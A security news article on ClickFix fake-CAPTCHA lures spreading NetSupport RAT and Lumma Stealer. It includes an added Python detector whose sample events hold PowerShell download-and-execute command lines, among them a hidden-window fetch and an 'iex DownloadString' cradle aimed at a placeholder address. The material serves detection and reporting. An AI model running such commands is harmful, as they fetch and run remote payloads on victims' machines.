
February 11, 2025 | Ravie Lakshmanan | Malware / Cyber Attack

Threat actors have been observed utilizing the increasingly prevalent ClickFix technique to distribute a remote access trojan known as NetSupport RAT, starting from early January 2025.

NetSupport RAT, which is typically spread through fake websites and bogus browser updates, grants attackers complete control over the compromised host, allowing them to monitor the device’s screen in real-time, control the keyboard and mouse, upload and download files, and execute malicious commands.

Originally developed as a legitimate remote IT support program called NetSupport Manager, it has since been repurposed by malicious actors to target organizations and capture sensitive information, including screenshots, audio, video, and files.

“The ClickFix technique involves injecting a fake CAPTCHA webpage on compromised websites, instructing users to follow certain steps to copy and execute malicious PowerShell commands on their host to download and run malware payloads,” according to an analysis by eSentire.

In the identified attack chains, the PowerShell command is used to download and execute the NetSupport RAT client from a remote server hosting malicious components in the form of PNG image files.
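The defender-side counterpart to the chain described above is process-creation telemetry: PowerShell launched by the user's own interactive shell, carrying a download cradle and fetching a payload that is named as an image. The following is an added example, not code from the article or from eSentire. It scores constructed records shaped like the fields of Windows Security event 4688 (process creation); the sample command lines, the TEST-NET address 203.0.113.10, and the choice of explorer.exe as the "interactive parent" indicator are all assumptions made for the illustration.

```python
import re

# Constructed sample records in the shape of Windows event 4688 fields.
# These are not real telemetry; the address 203.0.113.10 is reserved for documentation.
SAMPLE_EVENTS = [
    {"ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr http://203.0.113.10/img/update.png -OutFile $env:TEMP\a.png"'},
    {"ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (New-Object Net.WebClient).DownloadString(\'http://203.0.113.10/verify\')"'},
    {"ParentProcessName": r"C:\Program Files\ConfigTool\deploy.exe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},
    {"ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir"},
]

# Assumption: a parent of explorer.exe means the user launched PowerShell
# interactively (for example by pasting a command), not via a script or installer.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Common PowerShell download-cradle cmdlets and .NET helpers.
DOWNLOAD_CRADLE = re.compile(
    r"(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
    r"net\.webclient|start-bitstransfer)", re.I)
# Flags that hide the window, bypass policy, or evaluate fetched text.
EXEC_MARKERS = re.compile(
    r"(\biex\b|invoke-expression|-enc\w*\s|-w(indowstyle)?\s+hidden|"
    r"-ep\s+bypass|-executionpolicy\s+bypass)", re.I)
# The article notes the RAT components were served as PNG files.
IMAGE_URL = re.compile(r"https?://\S+\.(png|jpg|gif)\b", re.I)


def score_event(ev):
    """Return the list of reasons a process-creation record looks like ClickFix."""
    reasons = []
    parent = ev["ParentProcessName"].rsplit("\\", 1)[-1].lower()
    child = ev["NewProcessName"].rsplit("\\", 1)[-1].lower()
    cmd = ev["CommandLine"]
    if child not in ("powershell.exe", "pwsh.exe"):
        return reasons
    if parent in INTERACTIVE_PARENTS:
        reasons.append("powershell spawned from interactive shell")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle")
    if EXEC_MARKERS.search(cmd):
        reasons.append("hidden/bypass/inline execution flag")
    if IMAGE_URL.search(cmd):
        reasons.append("fetches image-named URL")
    return reasons


def flag_clickfix(events, min_reasons=2):
    """Return (command line, reasons) for events that hit at least min_reasons indicators."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            hits.append((ev["CommandLine"], reasons))
    return hits


if __name__ == "__main__":
    for cmd, why in flag_clickfix(SAMPLE_EVENTS):
        print(cmd)
        print("   ->", ", ".join(why))
```

Requiring two independent indicators keeps a lone administrator running `-ExecutionPolicy Bypass` out of the alert queue, while a user-launched PowerShell that both hides its window and pulls a ".png" from the web scores on every rule.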

Notably, the ClickFix approach is also being utilized to spread an updated version of the Lumma Stealer malware, which employs the ChaCha20 cipher for decrypting a configuration file containing the list of command-and-control (C2) servers.

eSentire noted that “these changes provide insight into the evasive tactics employed by the developer(s) who are actively working to circumvent current extraction and analysis tools.”
